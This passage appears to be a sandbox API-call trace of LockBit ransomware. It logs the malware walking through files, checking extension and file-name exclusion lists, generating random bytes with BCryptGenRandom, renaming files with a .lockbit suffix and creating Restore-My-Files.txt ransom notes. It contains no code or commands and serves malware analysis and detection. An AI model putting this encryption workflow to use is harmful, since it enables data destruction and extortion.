(lpString1="autorun.inf", lpString2="PH02291U.BMP") returned -1 [0169.044] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02291U.BMP") returned 1 [0169.044] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02291U.BMP") returned -1 [0169.044] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0169.044] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02291U.BMP") returned=".BMP" [0169.044] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0169.044] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0169.044] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0169.044] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0169.044] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0169.044] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0169.044] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0169.044] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0169.044] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0169.044] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0169.044] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0169.044] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0169.044] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0169.044] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0169.044] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0169.044] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0169.044] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0169.044] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0169.045] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0169.045] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0169.045] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0169.045] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0169.045] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0169.045] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0169.045] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0169.045] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0169.045] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0169.045] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0169.045] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02291U.BMP.lockbit") returned 72 [0169.045] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02291U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02291u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0169.046] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0169.046] malloc (_Size=0x40068) returned 0x3df0008 [0169.046] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=32184) returned 1 [0169.046] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.047] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0169.047] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.047] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0169.047] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0169.049] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02291U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02291U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.049] malloc (_Size=0xa6) returned 0x1fa2ed8 [0169.050] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0169.051] free (_Block=0x1fa2ed8) [0169.051] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02291U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0169.051] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0169.051] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0169.051] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2880f000, ftCreationTime.dwHighDateTime=0x1bd4e54, ftLastAccessTime.dwLowDateTime=0x5a3ff2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2880f000, ftLastWriteTime.dwHighDateTime=0x1bd4e54, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02398U.BMP", cAlternateFileName="")) returned 1 [0169.051] lstrcmpiW (lpString1=".", lpString2="PH02398U.BMP") returned -1 [0169.051] lstrcmpiW (lpString1="..", lpString2="PH02398U.BMP") returned -1 [0169.051] PathFindExtensionW (pszPath="PH02398U.BMP") returned=".BMP" [0169.051] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0169.051] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0169.051] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0169.051] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0169.051] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0169.051] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0169.051] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0169.051] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0169.051] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0169.051] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0169.052] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0169.052] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0169.052] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0169.053] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0169.053] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0169.053] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0169.053] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0169.053] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.053] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0169.053] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0169.053] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0169.053] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0169.053] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02398U.BMP") returned 1 [0169.053] lstrcmpiW (lpString1="ntldr", lpString2="PH02398U.BMP") returned -1 [0169.053] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02398U.BMP") returned -1 [0169.053] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02398U.BMP") returned -1 [0169.053] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02398U.BMP") returned -1 [0169.053] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02398U.BMP") returned 1 [0169.053] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02398U.BMP") returned -1 [0169.053] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0169.053] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02398U.BMP") returned=".BMP" [0169.053] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0169.053] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0169.053] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0169.053] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0169.053] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0169.053] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0169.053] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0169.053] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0169.053] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0169.054] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0169.054] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0169.054] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0169.054] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0169.054] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0169.054] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0169.054] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0169.054] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0169.054] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0169.054] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0169.054] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0169.054] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0169.054] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0169.054] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0169.054] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0169.054] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0169.054] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0169.054] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0169.054] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0169.054] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02398U.BMP.lockbit") returned 72 [0169.054] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02398U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02398u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0169.055] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0169.055] malloc (_Size=0x40068) returned 0x1ff1e60 [0169.055] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=31968) returned 1 [0169.055] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.056] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0169.056] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.056] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0169.056] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.061] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02398U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02398U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.062] malloc (_Size=0xa6) returned 0x1fa2ed8 [0169.062] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0169.064] free (_Block=0x1fa2ed8) [0169.064] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02398U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0169.064] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0169.064] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0169.064] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5a3ff2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xdd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02412K.JPG", cAlternateFileName="")) returned 1 [0169.064] lstrcmpiW (lpString1=".", lpString2="PH02412K.JPG") returned -1 [0169.064] lstrcmpiW (lpString1="..", lpString2="PH02412K.JPG") returned -1 [0169.064] PathFindExtensionW (pszPath="PH02412K.JPG") returned=".JPG" [0169.064] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0169.064] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0169.064] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0169.064] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0169.064] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0169.064] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0169.065] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0169.065] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0169.065] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0169.065] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0169.065] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0169.065] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0169.065] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0169.065] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0169.065] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0169.065] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0169.065] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0169.065] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0169.065] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0169.065] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0169.065] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0169.065] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0169.065] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0169.065] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0169.065] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0169.065] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0169.065] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0169.065] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0169.065] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0169.066] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0169.066] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0169.066] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0169.066] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0169.066] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0169.066] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0169.066] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0169.066] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0169.066] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0169.066] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0169.066] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0169.066] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0169.066] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0169.066] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0169.066] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0169.066] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0169.066] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0169.066] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0169.066] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02412K.JPG") returned 1 [0169.066] lstrcmpiW (lpString1="ntldr", lpString2="PH02412K.JPG") returned -1 [0169.066] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02412K.JPG") returned -1 [0169.066] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02412K.JPG") returned -1 [0169.067] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02412K.JPG") returned -1 [0169.067] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02412K.JPG") returned 1 [0169.067] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02412K.JPG") returned -1 [0169.067] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0169.067] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02412K.JPG") returned=".JPG" [0169.067] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0169.067] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0169.067] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0169.067] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0169.067] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0169.067] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0169.067] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0169.067] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0169.067] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0169.067] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0169.067] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0169.067] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0169.067] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0169.067] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0169.067] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0169.067] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0169.067] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0169.067] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0169.067] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0169.067] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0169.067] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0169.068] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0169.068] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0169.068] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0169.068] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0169.068] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0169.068] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0169.068] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0169.068] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02412K.JPG.lockbit") returned 72 [0169.068] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02412K.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02412k.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0169.069] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0169.069] malloc (_Size=0x40068) returned 0x3df0008 [0169.069] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3541) returned 1 [0169.069] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.070] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0169.070] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.070] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0169.070] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0169.075] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02412K.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02412K.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.075] malloc (_Size=0xa6) returned 0x1fa2ed8 [0169.075] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0169.077] free (_Block=0x1fa2ed8) [0169.077] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02412K.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0169.077] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0169.077] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0169.077] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x156e2000, ftCreationTime.dwHighDateTime=0x1bd4e54, ftLastAccessTime.dwLowDateTime=0x5a3ff2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x156e2000, ftLastWriteTime.dwHighDateTime=0x1bd4e54, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02417U.BMP", cAlternateFileName="")) returned 